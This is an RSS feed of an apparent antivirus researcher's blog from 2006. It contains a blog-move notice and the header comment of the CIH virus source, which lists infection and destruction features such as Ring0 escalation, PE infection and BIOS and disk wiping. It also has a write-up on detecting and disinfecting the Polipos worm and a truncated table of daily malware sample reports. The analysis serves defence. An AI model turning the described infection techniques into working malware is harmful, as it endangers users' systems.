<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>加糖苦咖啡 &#124; daishuo's blog</title>
	<atom:link href="http://blog.donews.com/daishuo/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.donews.com/daishuo</link>
	<description>戴硕的blog</description>
	<lastBuildDate>Sat, 05 Aug 2006 03:36:00 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>我的博客搬家啦！</title>
		<link>http://blog.donews.com/daishuo/archive/2006/07/15/959695.aspx</link>
		<comments>http://blog.donews.com/daishuo/archive/2006/07/15/959695.aspx#comments</comments>
		<pubDate>Sat, 15 Jul 2006 01:24:00 +0000</pubDate>
		<dc:creator>daishuo</dc:creator>
				<category><![CDATA[1.反病毒]]></category>

		<guid isPermaLink="false">http://blog.donews.com/daishuo/archive/2006/07/15/959695.aspx</guid>
		<description><![CDATA[已经正式落户百度空间。欢迎大家访问！
http://hi.baidu.com/daishuo
&#160;
]]></description>
			<content:encoded><![CDATA[<p><font size="4"><strong>已经正式落户百度空间。欢迎大家访问！</strong></font></p>
<p><a href="http://hi.baidu.com/daishuo"><font size="4">http://hi.baidu.com/daishuo</font></a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.donews.com/daishuo/archive/2006/07/15/959695.aspx/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>纪念4.26——CIH日</title>
		<link>http://blog.donews.com/daishuo/archive/2006/04/26/846515.aspx</link>
		<comments>http://blog.donews.com/daishuo/archive/2006/04/26/846515.aspx#comments</comments>
		<pubDate>Wed, 26 Apr 2006 02:02:00 +0000</pubDate>
		<dc:creator>daishuo</dc:creator>
				<category><![CDATA[1.反病毒]]></category>

		<guid isPermaLink="false">http://blog.donews.com/daishuo/archive/2006/04/26/846515.aspx</guid>
		<description><![CDATA[; **************************************************************************** 
; * The Virus Program Information                                            * 
; **************************************************************************** 
; *                                                                          *
; * Designer ]]></description>
			<content:encoded><![CDATA[<p><img style="WIDTH: 125px; HEIGHT: 175px" height="175" alt="cih_AUTHOR" src="http://static.flickr.com/46/135134655_f8a1fd244c_o.jpg" width="125"/></p>
</p>
<pre>; ********************************************************************
; * The Virus Program Information                                    *
; ********************************************************************
; *                                                                  *
; * Designer : CIH Original Place : TTIT of Taiwan                   *
; * Create Date : 04/26/1998 Now Version : 1.2                       *
; * Modification Time : 05/21/1998                                   *
; *                                                                  *
; *==================================================================*
; * Modification History                                             *
; *==================================================================*
; * v1.0 1. Create the Virus Program.                                *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.                *
; * 04/26/1998 3. Virus Code doesn't Reload into System.             *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System.     *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.      *
; * 6. When System Opens Existing PE File, the File will be          *
; * Infected, and the File doesn't be Reinfected.                    *
; * 7. It is also Infected, even the File is Read-Only.              *
; * 8. When the File is Infected, the Modification Date and Time     *
; * of the File also don't be Changed.                               *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call      *
; * Previous FileSystemApiHook, it will Call the Function            *
; * that the IFS Manager Would Normally Call to Implement            *
; * this Particular I/O Request.                                     *
; * 10. The Virus Size is only 656 Bytes.                            *
; *==================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase  *
; * it's Size... ^__^                                                *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.      *
; * When Exception Error Occurs, Our OS System should be in          *
; * Windows NT. So My Cute Virus will not Continue to Run,           *
; * it will Jmup to Original Application to Run.                     *
; * 3. Use Better Algorithm, Reduce Virus Code Size.                 *
; * 4. The Virus &quot;Basic&quot; Size is only 796 Bytes.                     *
; *==================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...        *
; * 2. Modify the Bug of v1.1                                        *
; * 05/21/1998 3. The Virus &quot;Basic&quot; Size is 1003 Bytes.              *
; ********************************************************************
</pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.donews.com/daishuo/archive/2006/04/26/846515.aspx/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>P2P-Worm.Win32.Polipos.a的查杀原理(初步)</title>
		<link>http://blog.donews.com/daishuo/archive/2006/04/26/846256.aspx</link>
		<comments>http://blog.donews.com/daishuo/archive/2006/04/26/846256.aspx#comments</comments>
		<pubDate>Wed, 26 Apr 2006 01:32:00 +0000</pubDate>
		<dc:creator>daishuo</dc:creator>
				<category><![CDATA[1.反病毒]]></category>

		<guid isPermaLink="false">http://blog.donews.com/daishuo/archive/2006/04/26/846256.aspx</guid>
		<description><![CDATA[<p>&#160;&#160;&#160;&#160; 24号下班前，收到小陌的MSN消息，关于P2P-Worm.Win32.Polipos.a这个病毒的。惭愧得很，前2周一直在做项目开发，病毒分析工作扔下了，以致在小陌给我发信息前，都没有听说过这个病毒。病毒资料在小陌的blog上已经有了，白天我看了一下这个毒，主要目的是查杀。<br/>&#160;&#160;&#160;&#160; Polipos这个病毒用了变形引擎，每次感染的代码和数据都不同。我看了10分钟左右，觉得写一个搞定变形引擎的模块，工作量至少要2、3天。所以暂停了对变形代码的跟踪。在虚拟机里运行病毒，得到了几个感染样本。从感染样本中总结规律：<br/>1、从被感染的样本来看，比原来多了一个节，节名为8个0字节，大小不定，60K左右，节属性为0xe0000060。<br/>2、病毒用了EPO，替换原程序中对某个API的调用指令(call ds:[API地址])，用相对地址调用的方式(call virus_Entry)进入病毒入口函数。被替换的API是随机选择的，源程序中所有call ds:[API地址]语句都被替换了。<]]></description>
			<content:encoded><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp; 24号下班前，收到小陌的MSN消息，关于P2P-Worm.Win32.Polipos.a这个病毒的。惭愧得很，前2周一直在做项目开发，病毒分析工作扔下了，以致在小陌给我发信息前，都没有听说过这个病毒。病毒资料在小陌的blog上已经有了，白天我看了一下这个毒，主要目的是查杀。<br/>&nbsp;&nbsp;&nbsp;&nbsp; Polipos这个病毒用了变形引擎，每次感染的代码和数据都不同。我看了10分钟左右，觉得写一个搞定变形引擎的模块，工作量至少要2、3天。所以暂停了对变形代码的跟踪。在虚拟机里运行病毒，得到了几个感染样本。从感染样本中总结规律：<br/>1、从被感染的样本来看，比原来多了一个节，节名为8个0字节，大小不定，60K左右，节属性为0xe0000060。<br/>2、病毒用了EPO，替换原程序中对某个API的调用指令(call ds:[API地址])，用相对地址调用的方式(call virus_Entry)进入病毒入口函数。被替换的API是随机选择的，源程序中所有call ds:[API地址]语句都被替换了。<br/>3、病毒入口函数是变形的，但最初几条语句总是：<br/>push ebp<br/>mov&nbsp; ebp, esp<br/>sub&nbsp; esp, ??<br/>pusha</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 对Polipos.a病毒进行检测，可以从下面几点入手：<br/>step 1、根据新增病毒节的特征，可以快速排除绝大多数正常程序；<br/>step 2、读取病毒节数据，根据病毒入口函数初始代码的特点，全文扫描可能的病毒入口地址；<br/>step 3、读取代码节(程序入口所在节)数据，全文扫描对可能病毒入口的调用语句。<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 根据后来的实验显示，step 2找到的可能入口大约在15～25个，记录这些可能入口地址的包围盒(最大最小值)可以大幅优化step 3的执行速度。step 3可能找到多个调用语句，只选取最先找到的一个(因为病毒会在代码节后面的空隙处插入代码)。<br/>&nbsp;&nbsp;&nbsp;&nbsp; step 3结果不为空的样本，足以判断是病毒，误报率也应接近于0。</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 通过检测模块，可以确定病毒入口地址。最基本的修复工作是：将程序中所有对病毒入口的调用语句还原成对API的调用。这里最大的难题在于，如果不搞定变形引擎，无法直接知道病毒替换了对哪个API的调用语句。<br/>有一种间接方案可以考虑：<br/>step 1、遍历Import表，记录所有API的位置；<br/>step 2、全文扫描代码节，记录对各个API的引用情况；<br/>step 3、如果step 2结果显示存在且仅存在1个未被引用的API，那么这个API就是被病毒替换的。<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 需要说明的是step 2，通常编译器生成的调用API的代码有下面3种方式：<br/>#1, call ds:[API地址]<br/>#2, mov reg32, ds:[API地址]<br/>&nbsp;&nbsp;&nbsp; call reg32<br/>#3, call jmp_API<br/>&nbsp; jmp_API:<br/>&nbsp;&nbsp;&nbsp; jmp ds:[API地址]<br/>&nbsp;&nbsp;&nbsp;&nbsp; 实验证明，对于病毒样本，step 3有时会找不到未被引用的API，这个概率接近15%。原因是编译器生成的代码中，对同一API可能应用不同方式的调用代码，而病毒替换的只是call ds:[API地址]这一种方式而已。<br/>约15%清除失败的概率，使得本文描述的解决方案只能成为&ldquo;初步&rdquo;方案。这个初步方案的最大好处是完全绕开了变形引擎，因此实现起来工作量较小。代码完成，400行左右的规模，准备随KV 4月26日上午升级入库。<br/></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.donews.com/daishuo/archive/2006/04/26/846256.aspx/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>昨日病毒(2006.04.03)</title>
		<link>http://blog.donews.com/daishuo/archive/2006/04/04/811294.aspx</link>
		<comments>http://blog.donews.com/daishuo/archive/2006/04/04/811294.aspx#comments</comments>
		<pubDate>Tue, 04 Apr 2006 04:53:00 +0000</pubDate>
		<dc:creator>daishuo</dc:creator>
				<category><![CDATA[1.反病毒]]></category>

		<guid isPermaLink="false">http://blog.donews.com/daishuo/archive/2006/04/04/811294.aspx</guid>
		<description><![CDATA[4月3日上报次数较多的样本有：
mssave.exe -------- 562; 
extrmous.exe -------- 528; 
explore.exe -------- 497; 
guest.exe -------- 245; 
phost.exe -------- 218; 
lup.exe -------- 184; 
mssvcc.exe -------- 146; 
newname8.exe -------- 140; 
mousepad8.exe -------- 113; 
winsystems.exe -------- 108; 
keyboard8.exe -------- 71; 
 
请进入全文查看它们的技术报告。]]></description>
			<content:encoded><![CDATA[<p><P><SPAN> <br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 562px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 562px" width=562></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 41px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #99ccff" width=562><br />
<DIV><STRONG><FONT face=Arial>昨日病毒</FONT></STRONG></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 31px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 295px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 146px" width=146><br />
<COL style="WIDTH: 149px" width=149></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=146><br />
<DIV><FONT face=Arial><STRONG>统计时段</STRONG></FONT></DIV></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=149><br />
<DIV><FONT face=宋体><br />
<DIV title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline; FONT-SIZE: x-small; MARGIN: 1px 1px 2px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; BACKGROUND-COLOR: window"><SPAN id=L0238050004700606 style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; OVERFLOW: hidden; WIDTH: 100%; MARGIN-RIGHT: 22px; PADDING-TOP: 0px; WHITE-SPACE: nowrap; HEIGHT: 100%">2006-4-3</SPAN><SPAN style="MARGIN-LEFT: -21px; WIDTH: 20px; HEIGHT: 18px"></SPAN></DIV></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 555px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 555px" width=555></COLGROUP><br />
<TBODY><br />
<TR><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><br />
<DIV><STRONG><FONT face=Arial>病毒样本上报数排行</FONT></STRONG></DIV><br />
<DIV><STRONG><FONT face=Arial></FONT></STRONG> </DIV><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 394px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 165px" width=165></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 22px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=229><br />
<DIV align=center><FONT face=Arial>样本文件名</FONT></DIV></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=165><br />
<DIV align=center><FONT face=Arial>上报次数</FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR></TBODY><br />
<TBODY><br />
<TR id=L023806C006A80CC9><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L0238074008E0140C title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssave.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L023807800B181B8F title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">562</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L023807C00D502352><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L023808400F882B95 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">extrmous.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L0238088011C03418 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">528</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L023808C013F83CDB><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L023809401630461E title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">explore.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L0238098018684FA1 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">497</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L023809C01AA05964><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L02380A401CD863A7 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">guest.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L02380A801F106E2A title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">245</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L02380AC0214878ED><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L02380B4023808430 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">phost.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
